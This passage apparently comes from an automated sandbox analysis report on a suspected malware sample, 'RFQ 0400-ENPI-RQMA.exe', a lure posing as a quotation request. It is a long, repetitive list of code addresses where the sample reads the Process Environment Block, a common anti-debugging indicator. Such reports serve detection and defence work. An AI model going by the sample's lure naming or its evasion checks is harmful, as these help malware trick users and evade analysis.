            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148903E mov eax, dword ptr fs:[00000030h]2_2_0148903E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148903E mov eax, dword ptr fs:[00000030h]2_2_0148903E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148903E mov eax, dword ptr fs:[00000030h]2_2_0148903E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143D0C0 mov eax, dword ptr fs:[00000030h]2_2_0143D0C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143D0C0 mov eax, dword ptr fs:[00000030h]2_2_0143D0C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014950D9 mov eax, dword ptr fs:[00000030h]2_2_014950D9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014420DE mov eax, dword ptr fs:[00000030h]2_2_014420DE
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F909C mov eax, dword ptr fs:[00000030h]2_2_013F909C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014460E0 mov eax, dword ptr fs:[00000030h]2_2_014460E0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C5096 mov eax, dword ptr fs:[00000030h]2_2_013C5096
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013ED090 mov eax, dword ptr fs:[00000030h]2_2_013ED090
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013ED090 mov eax, dword ptr fs:[00000030h]2_2_013ED090
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014020F0 mov ecx, dword ptr fs:[00000030h]2_2_014020F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C208A mov eax, dword ptr fs:[00000030h]2_2_013C208A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BD08D mov eax, dword ptr fs:[00000030h]2_2_013BD08D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144D080 mov eax, dword ptr fs:[00000030h]2_2_0144D080
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144D080 mov eax, dword ptr fs:[00000030h]2_2_0144D080
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BC0F0 mov eax, dword ptr fs:[00000030h]2_2_013BC0F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C80E9 mov eax, dword ptr fs:[00000030h]2_2_013C80E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BA0E3 mov ecx, dword ptr fs:[00000030h]2_2_013BA0E3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E50E4 mov eax, dword ptr fs:[00000030h]2_2_013E50E4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E50E4 mov ecx, dword ptr fs:[00000030h]2_2_013E50E4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E90DB mov eax, dword ptr fs:[00000030h]2_2_013E90DB
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014580A8 mov eax, dword ptr fs:[00000030h]2_2_014580A8
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014860B8 mov eax, dword ptr fs:[00000030h]2_2_014860B8
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014860B8 mov ecx, dword ptr fs:[00000030h]2_2_014860B8
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov ecx, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov ecx, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov ecx, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov ecx, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01495341 mov eax, dword ptr fs:[00000030h]2_2_01495341
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B7330 mov eax, dword ptr fs:[00000030h]2_2_013B7330
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EF32A mov eax, dword ptr fs:[00000030h]2_2_013EF32A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144035C mov eax, dword ptr fs:[00000030h]2_2_0144035C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144035C mov eax, dword ptr fs:[00000030h]2_2_0144035C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144035C mov eax, dword ptr fs:[00000030h]2_2_0144035C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144035C mov ecx, dword ptr fs:[00000030h]2_2_0144035C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144035C mov eax, dword ptr fs:[00000030h]2_2_0144035C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144035C mov eax, dword ptr fs:[00000030h]2_2_0144035C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148A352 mov eax, dword ptr fs:[00000030h]2_2_0148A352
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147F367 mov eax, dword ptr fs:[00000030h]2_2_0147F367
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BC310 mov ecx, dword ptr fs:[00000030h]2_2_013BC310
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E0310 mov ecx, dword ptr fs:[00000030h]2_2_013E0310
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FA30B mov eax, dword ptr fs:[00000030h]2_2_013FA30B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FA30B mov eax, dword ptr fs:[00000030h]2_2_013FA30B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FA30B mov eax, dword ptr fs:[00000030h]2_2_013FA30B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146437C mov eax, dword ptr fs:[00000030h]2_2_0146437C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C7370 mov eax, dword ptr fs:[00000030h]2_2_013C7370
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C7370 mov eax, dword ptr fs:[00000030h]2_2_013C7370
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C7370 mov eax, dword ptr fs:[00000030h]2_2_013C7370
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144930B mov eax, dword ptr fs:[00000030h]2_2_0144930B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144930B mov eax, dword ptr fs:[00000030h]2_2_0144930B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144930B mov eax, dword ptr fs:[00000030h]2_2_0144930B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148132D mov eax, dword ptr fs:[00000030h]2_2_0148132D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148132D mov eax, dword ptr fs:[00000030h]2_2_0148132D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B9353 mov eax, dword ptr fs:[00000030h]2_2_013B9353
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B9353 mov eax, dword ptr fs:[00000030h]2_2_013B9353
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BD34C mov eax, dword ptr fs:[00000030h]2_2_013BD34C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BD34C mov eax, dword ptr fs:[00000030h]2_2_013BD34C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014463C0 mov eax, dword ptr fs:[00000030h]2_2_014463C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147C3CD mov eax, dword ptr fs:[00000030h]2_2_0147C3CD
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147B3D0 mov ecx, dword ptr fs:[00000030h]2_2_0147B3D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E33A5 mov eax, dword ptr fs:[00000030h]2_2_013E33A5
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F33A0 mov eax, dword ptr fs:[00000030h]2_2_013F33A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F33A0 mov eax, dword ptr fs:[00000030h]2_2_013F33A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147F3E6 mov eax, dword ptr fs:[00000030h]2_2_0147F3E6
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B8397 mov eax, dword ptr fs:[00000030h]2_2_013B8397
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B8397 mov eax, dword ptr fs:[00000030h]2_2_013B8397
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B8397 mov eax, dword ptr fs:[00000030h]2_2_013B8397
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E438F mov eax, dword ptr fs:[00000030h]2_2_013E438F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E438F mov eax, dword ptr fs:[00000030h]2_2_013E438F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BE388 mov eax, dword ptr fs:[00000030h]2_2_013BE388
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BE388 mov eax, dword ptr fs:[00000030h]2_2_013BE388
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BE388 mov eax, dword ptr fs:[00000030h]2_2_013BE388
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014953FC mov eax, dword ptr fs:[00000030h]2_2_014953FC
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F63FF mov eax, dword ptr fs:[00000030h]2_2_013F63FF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DE3F0 mov eax, dword ptr fs:[00000030h]2_2_013DE3F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DE3F0 mov eax, dword ptr fs:[00000030h]2_2_013DE3F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DE3F0 mov eax, dword ptr fs:[00000030h]2_2_013DE3F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0149539D mov eax, dword ptr fs:[00000030h]2_2_0149539D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0141739A mov eax, dword ptr fs:[00000030h]2_2_0141739A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0141739A mov eax, dword ptr fs:[00000030h]2_2_0141739A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA3C0 mov eax, dword ptr fs:[00000030h]2_2_013CA3C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA3C0 mov eax, dword ptr fs:[00000030h]2_2_013CA3C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA3C0 mov eax, dword ptr fs:[00000030h]2_2_013CA3C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA3C0 mov eax, dword ptr fs:[00000030h]2_2_013CA3C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA3C0 mov eax, dword ptr fs:[00000030h]2_2_013CA3C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA3C0 mov eax, dword ptr fs:[00000030h]2_2_013CA3C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C83C0 mov eax, dword ptr fs:[00000030h]2_2_013C83C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C83C0 mov eax, dword ptr fs:[00000030h]2_2_013C83C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C83C0 mov eax, dword ptr fs:[00000030h]2_2_013C83C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C83C0 mov eax, dword ptr fs:[00000030h]2_2_013C83C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B823B mov eax, dword ptr fs:[00000030h]2_2_013B823B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01448243 mov eax, dword ptr fs:[00000030h]2_2_01448243
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01448243 mov ecx, dword ptr fs:[00000030h]2_2_01448243
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147B256 mov eax, dword ptr fs:[00000030h]2_2_0147B256
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147B256 mov eax, dword ptr fs:[00000030h]2_2_0147B256
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148D26B mov eax, dword ptr fs:[00000030h]2_2_0148D26B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148D26B mov eax, dword ptr fs:[00000030h]2_2_0148D26B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01401270 mov eax, dword ptr fs:[00000030h]2_2_01401270
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01401270 mov eax, dword ptr fs:[00000030h]2_2_01401270
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F7208 mov eax, dword ptr fs:[00000030h]2_2_013F7208
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F7208 mov eax, dword ptr fs:[00000030h]2_2_013F7208
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E9274 mov eax, dword ptr fs:[00000030h]2_2_013E9274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B826B mov eax, dword ptr fs:[00000030h]2_2_013B826B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C4260 mov eax, dword ptr fs:[00000030h]2_2_013C4260
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C4260 mov eax, dword ptr fs:[00000030h]2_2_013C4260
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C4260 mov eax, dword ptr fs:[00000030h]2_2_013C4260
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C6259 mov eax, dword ptr fs:[00000030h]2_2_013C6259
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BA250 mov eax, dword ptr fs:[00000030h]2_2_013BA250
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01495227 mov eax, dword ptr fs:[00000030h]2_2_01495227
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F724D mov eax, dword ptr fs:[00000030h]2_2_013F724D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B9240 mov eax, dword ptr fs:[00000030h]2_2_013B9240
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B9240 mov eax, dword ptr fs:[00000030h]2_2_013B9240
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D02A0 mov eax, dword ptr fs:[00000030h]2_2_013D02A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D02A0 mov eax, dword ptr fs:[00000030h]2_2_013D02A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D52A0 mov eax, dword ptr fs:[00000030h]2_2_013D52A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D52A0 mov eax, dword ptr fs:[00000030h]2_2_013D52A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D52A0 mov eax, dword ptr fs:[00000030h]2_2_013D52A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D52A0 mov eax, dword ptr fs:[00000030h]2_2_013D52A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F329E mov eax, dword ptr fs:[00000030h]2_2_013F329E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F329E mov eax, dword ptr fs:[00000030h]2_2_013F329E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014952E2 mov eax, dword ptr fs:[00000030h]2_2_014952E2
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FE284 mov eax, dword ptr fs:[00000030h]2_2_013FE284
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FE284 mov eax, dword ptr fs:[00000030h]2_2_013FE284
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147F2F8 mov eax, dword ptr fs:[00000030h]2_2_0147F2F8
